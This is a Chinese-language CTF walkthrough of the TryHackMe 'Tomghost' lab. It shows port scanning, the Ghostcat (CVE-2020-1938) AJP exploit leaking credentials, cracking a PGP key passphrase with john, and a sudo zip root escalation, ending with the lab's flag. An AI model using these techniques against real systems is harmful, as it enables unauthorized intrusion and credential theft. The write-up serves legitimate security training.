Tomghost

tomghost

首先扫一下端口:

~$ nmap 10.201.95.183
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-18 11:08 UTC
Nmap scan report for 10.201.95.183
Host is up (0.095s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxyNmap done: 1 IP address (1 host up) scanned in 2.84 seconds

再看看8080的详情:

Birkenwald@VMLinux:~$ nmap 10.201.95.183
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-18 11:08 UTC
Nmap scan report for 10.201.95.183
Host is up (0.095s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
8009/tcp open  ajp13
8080/tcp open  http-proxyNmap done: 1 IP address (1 host up) scanned in 2.84 seconds
Birkenwald@VMLinux:~$ nmap 10.201.95.183 -sV -p 8080
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-18 11:13 UTC
Nmap scan report for 10.201.95.183
Host is up (0.094s latency).PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat 9.0.30

​

找历史CVE的exploit

可以用searchsploit来找.

最终使用相关exp拿到账密:

Birkenwald@VMLinux:~$ python2 cve-2020-1938_exp.py 10.201.10.29
Getting resource at ajp13://10.201.10.29:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements.  See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0(the "License"); you may not use this file except in compliance withthe License.  You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, softwaredistributed under the License is distributed on an "AS IS" BASIS,WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.See the License for the specific language governing permissions andlimitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaeehttp://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"version="4.0"metadata-complete="true"><display-name>Welcome to Tomcat</display-name><description>Welcome to GhostCatskyfuck:8730281lkjlkjdqlksalks</description></web-app>

登录后find搜索即可拿到user.txt

尝试使用sudo -l提权,但是提示当前用户不能执行sudo.

尝试找SUID提权:

find / -perm -4000 -type f 2>/dev/null

也没有好用的.

pgp文件爆破解密

回头看home中有两个特殊后缀文件:credential.pgp tryhackme.asc

scp skyfuck@10.201.10.29:/home/skyfuck/ . 

下载文件到本地.

参考:关于PGP加密文件的解密方法 - 野荷 - 博客园

• 先把asc文件本身的hash解密:

  gpg2john 1.asc > hash.txt 
  

• 爆破密码asc的hash密码:

  ┌──(kali㉿kali)-[~]
  └─$ john --wordlist=rockyou.txt  hash.txt 
  Using default input encoding: UTF-8
  Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
  Cost 1 (s2k-count) is 65536 for all loaded hashes
  Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
  Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
  Will run 4 OpenMP threads
  Press 'q' or Ctrl-C to abort, almost any other key for status
  alexandru        (tryhackme)     
  1g 0:00:00:00 DONE (2025-11-18 10:00) 6.250g/s 6700p/s 6700c/s 6700C/s theresa..alexandru
  Use the "--show" option to display all of the cracked passwords reliably
  Session completed. 
  

• 解密:

  ┌──(kali㉿kali)-[~]
  └─$ gpg --import tryhackme.asc
  gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
  gpg: key 8F3DA3DEC6707170: secret key imported
  gpg: key 8F3DA3DEC6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
  gpg: Total number processed: 2
  gpg:              unchanged: 2
  gpg:       secret keys read: 1
  gpg:   secret keys imported: 1┌──(kali㉿kali)-[~]
  └─$ gpg --list-secret-keys    
  /home/kali/.gnupg/pubring.kbx
  -----------------------------
  sec   dsa3072 2020-03-11 [SCA]14B3794D5554349A715CDBA08F3DA3DEC6707170
  uid           [ unknown] tryhackme <stuxnet@tryhackme.com>
  ssb   elg1024 2020-03-11 [E]┌──(kali㉿kali)-[~]
  └─$ gpg --decrypt credential.pgp
  gpg: encrypted with elg1024 key, ID 61E104A66184FBCC, created 2020-03-11"tryhackme <stuxnet@tryhackme.com>"
  gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
  merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j                                                        
  

  横向移动+sudo -l提权

登录后zip提权:

merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #'adding: etc/hosts (deflated 31%)
# pwd
rm: missing operand
Try 'rm --help' for more information.
# whoami
root
# cd /root
# ls
root.txt  ufw
# cat root.txt    
THM{Z1P_1S_FAKE}